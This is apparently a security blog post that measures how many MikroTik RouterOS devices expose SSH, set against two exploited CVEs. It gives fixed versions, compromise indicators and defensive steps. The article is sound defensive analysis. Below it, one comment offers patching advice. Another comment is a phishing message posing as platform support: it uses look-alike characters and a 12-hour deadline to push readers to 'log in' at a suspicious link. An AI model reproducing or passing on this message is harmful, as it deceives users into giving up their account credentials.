2,857,655 RouterOS Matches and 830,366 With SSH: Turning an Edge Device Baseline Into a Decision
The MikroTrick chain in MikroTik RouterOS has a single, specific precondition: the SSH management service must be reachable from the internet. That makes the exposure question unusually tractable, because it reduces to a service-level count rather than a product-level one.
The context
CVE-2026-67276 is a missing authentication check in the RouterOS SSH implementation. CVE-2026-86060 is an improper neutralization of argument delimiters that allows privilege escalation through a malformed username. CERT Polska coordinated the disclosure of six RouterOS vulnerabilities on 5 September 2026 and confirmed that the two critical ones were being used to take over devices with internet-reachable SSH. CISA added them to KEV on 10 September 2026.
What the queries return
| Query | Matches |
|---|---|
app="RouterOS" |
2,857,655 |
app="RouterOS" && service="ssh" |
830,366 |
The difference between these two figures is the most useful thing in this article. Roughly 2.86 million RouterOS instances are fingerprinted, and about 830,000 of them had an SSH service observed. That is approximately 29 percent.
The 830,366 figure is the one that corresponds to the exposure condition described in the CERT Polska advisory.
What the SSH count does and does not mean
Even the narrower figure requires careful reading:
- An observed SSH service is not necessarily internet-reachable. A device may be fingerprinted through one interface while SSH is bound to an internal one, or restricted by firewall rules to specific source addresses.
- Version is not part of the query. Fixed releases include 6.49.21, 7.23.4 and 7.24.2. Many matched devices are patched.
- RouterOS deployments are heterogeneous. The same product is used in home offices, small businesses, ISPs and enterprise branch networks, and the security posture of those deployments differs enormously.
- The default firewall configuration matters. MikroTik's default configuration does not expose SSH to the internet, which means the exposed population is largely made up of devices where someone made a deliberate change.
That last point is worth emphasising, because it reframes the finding. The 830,366 figure is not a measure of carelessness in the abstract. It is a measure of how many devices had remote management deliberately enabled for operational reasons.
Why edge routers deserve individual attention
A router is not a web application. It routes traffic for everything behind it, it is always on, and it frequently decides which traffic is trusted. An attacker who controls one can modify routing and DNS, create administrator accounts that survive a reboot, and stage activity that appears to originate from the organisation's own address space.
That is why the useful response to this measurement is not statistical. It is a review of which devices have internet-reachable SSH, and whether each one needs to.
A practical method
-
Query for the specific condition.
app="RouterOS" && service="ssh"is the relevant baseline, not the product count. - Compare against your inventory. The gap between the external count and what you believe you own is a finding.
- Verify version on devices you own against 6.49.21, 7.23.4 and 7.24.2.
-
Check for the specific indicators. SSH attempts using the malformed username
-2, unexpected accounts such as one namedops, and a device status markedFlagged. - Decide explicitly whether SSH needs to be public. For most organisations, the honest answer is that it needs to be reachable by administrators, not by the internet.
The general principle
When a vulnerability's precondition is a specific exposed service, the exposure measurement becomes actionable in a way that a product count is not. The product count tells you how much of the software exists. The service count tells you how many instances satisfy the condition the attacker needs.
For RouterOS, that distinction is the difference between 2.86 million and 830,366, and only one of those numbers describes a set of devices worth reviewing this week.
References
- ZoomEye search results for
app="RouterOS"(2,857,655) andapp="RouterOS" && service="ssh"(830,366), collected 23 September 2026 - CERT Polska advisory on critical MikroTik RouterOS vulnerabilities, 5 September 2026
- NVD entries for CVE-2026-67276 and CVE-2026-86060
- CISA Known Exploited Vulnerabilities Catalog, RouterOS entries added 10 September 2026
Top comments (2)
Narrowing the attack surface to a service-level condition is what makes this tractable for defenders. Practical order of operations: verify which of those 830k are actually reachable from outside your perimeter (an external scan beats fingerprint data, exactly as you note), then patch in reachability order. For orgs that cannot patch immediately, binding SSH to the management network or source-restricting it breaks the chain precondition before the fix lands.
Dear Usеr,
Duе to an іncrease in bot activitу on the рlatform, wе requіre verіfy оf уоur account.
Plеasе lоg іn viа the link belоw:
• anti-bot.icu/5K0N5G7M9C4
Verificated dеаdline - 12 hours.
Sincerely,Dev Suрport